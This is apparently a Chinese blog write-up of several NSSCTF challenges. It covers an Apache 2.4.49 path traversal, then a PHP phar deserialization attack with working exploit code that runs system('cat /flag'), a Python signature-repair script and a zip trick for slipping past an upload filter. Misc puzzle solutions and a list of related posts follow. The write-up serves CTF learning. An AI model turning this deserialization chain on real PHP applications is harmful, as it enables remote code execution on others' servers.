NSSCTF

WEB

ez_rce

看版本，百度一下有目录穿越漏洞

Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用_Tauil的博客-CSDN博客

构造payload

这里制造了一个文件夹迷宫，仅存在四层

1zweb(revenge)

一个文件上传的页面，可以查看文件

先查看一下基本的文件，index.php，uoload.php，等

index.php

<?phpclass LoveNss{public $ljt;public $dky;public $cmd;public function __construct(){$this->ljt="ljt";$this->dky="dky";phpinfo();}public function __destruct(){if($this->ljt==="Misc"&&$this->dky==="Re")eval($this->cmd);}public function __wakeup(){$this->ljt="Re";$this->dky="Misc";}
}
$file=$_POST['file'];
if(isset($_POST['file'])){echo file_get_contents($file);
}
?>

file_get_contents读phar文件时能能触发返序列化漏洞，明显要让dky=“Re”,ljt=“Misc”，执行cmd的任意代码

pop

<?phpunlink('phar.phar');class LoveNss{public $ljt;public $dky;public $cmd;}$a=new LoveNss();$a->cmd="system('cat /flag');";$a->ljt="Misc";$a->dky="Re";$phar = new Phar('phar.phar');$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');$phar->setMetadata($a);$phar->addFromString('1.txt','dky');
?>

运行得到一个phar文件，我们还要绕过wakeup函数，

改完之后要修改签名

from hashlib import sha1
f = open('../phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('22.phar', 'wb').write(newf) # 写入新文件

再看upload.php

<?php
if ($_FILES["file"]["error"] > 0){echo "上传异常";
}
else{$allowedExts = array("gif", "jpeg", "jpg", "png");$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){$content=file_get_contents($_FILES["file"]["tmp_name"]);$pos = strpos($content, "__HALT_COMPILER();");if(gettype($pos)==="integer"){echo "ltj一眼就发现了phar";}else{if (file_exists("./upload/" . $_FILES["file"]["name"])){echo $_FILES["file"]["name"] . " 文件已经存在";}else{$myfile = fopen("./upload/".$_FILES["file"]["name"], "w");fwrite($myfile, $content);fclose($myfile);echo "上传成功 ./upload/".$_FILES["file"]["name"];}}}else{echo "dky不喜欢这个文件 .".$extension;}
}
?>

后缀必须是图片，且内容不能出现phar标志

可以压缩zip绕过

上传后用phar伪协议读取

MISC

Type Message

电话拨号

用九键拼出来是NSSCTF，后面三个音频都一样，拼起来就是flag

Knight’S Tour

拿到ChessBoard.zip压缩包，发现打不开，拖进010里看一看
好家伙，zip竟然是rar的头,直接修改头为504b0304 就可以正常解压解压后得到图片

观察分析，发现上面8x8的格子中正好对应下面的字母，应该是照顺序打乱了，结合题目Knight’s Tour,可以找到这样一个游戏根据游戏规则可以得到下面结果这里跟据第一列全为红色，每排有8个，只有两种颜色可以推测（脑洞）出红色代表0 黄色代表 1解出来为Ch1v@lry，即为flag

NSSCTF部分复现相关推荐

[NSSCTF][SCTF 2021]WEB复现
感谢NSSCTF提供复现环境 loginme middleware.go package middlewareimport ("github.com/gin-gonic/gin" ...
国赛ezpop题目复现（tp6）
前言五月份国赛题目涉及到tp6的反序列化,当时也是在网上找的exp打,不知道其中的链子是怎么构造的,前段时间也接触了tp框架的反序列化,利用这次机会好好复现一下,弄懂其中的原理.在ctfshow和n ...
[CTF]SCTF2021 WEB复现（详细版）
前言认真复现还是收获挺多的,做这些就算看wp也会卡很久的题目才容易提高.最后感谢下NSSCTF平台提供的靶机,虽然flag只有一半 Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造 ...
Facebook 发布深度学习工具包 PyTorch Hub，让论文复现变得更容易
近日,PyTorch 社区发布了一个深度学习工具包 PyTorchHub, 帮助机器学习工作者更快实现重要论文的复现工作.PyTorchHub 由一个预训练模型仓库组成,专门用于提高研究工作的复现性以 ...
【目标检测】yolo系列：从yolov1到yolov5之YOLOv1详解及复现
检测器通常能够被分为两类,一类是two-stage检测器,最具代表的为faster R-CNN:另一类是one-stage检测器,包括YOLO,SSD等.一般来说,two-stage检测器具有高定位和 ...
CV算法复现（分类算法2/6）：AlexNet（2012年 Hinton组）
致谢:霹雳吧啦Wz:https://space.bilibili.com/18161609 目录致谢:霹雳吧啦Wz:https://space.bilibili.com/18161609 1 本次要 ...
【神经网络】(17) EfficientNet 代码复现，网络解析，附Tensorflow完整代码
各位同学好,今天和大家分享一下如何使用 Tensorflow 复现 EfficientNet 卷积神经网络模型. EfficientNet 的网络结构和 MobileNetV3 比较相似,建议大家在学 ...
【神经网络】(16) MobileNetV3 代码复现，网络解析，附Tensorflow完整代码
各位同学好,今天和大家分享一下如何使用 Tensorflow 构建 MobileNetV3 轻量化网络模型. MobileNetV3 做了如下改动(1)更新了V2中的逆转残差结构:(2)使用NAS搜索 ...
【神经网络】(15) Xception 代码复现，网络解析，附Tensorflow完整代码
各位同学好,今天和大家分享一下如何使用 Tensorflow 构建 Xception 神经网络模型. 在前面章节中,我已经介绍了很多种轻量化卷积神经网络模型,感兴趣的可以看一下:https://blo ...

NSSCTF部分复现

WEB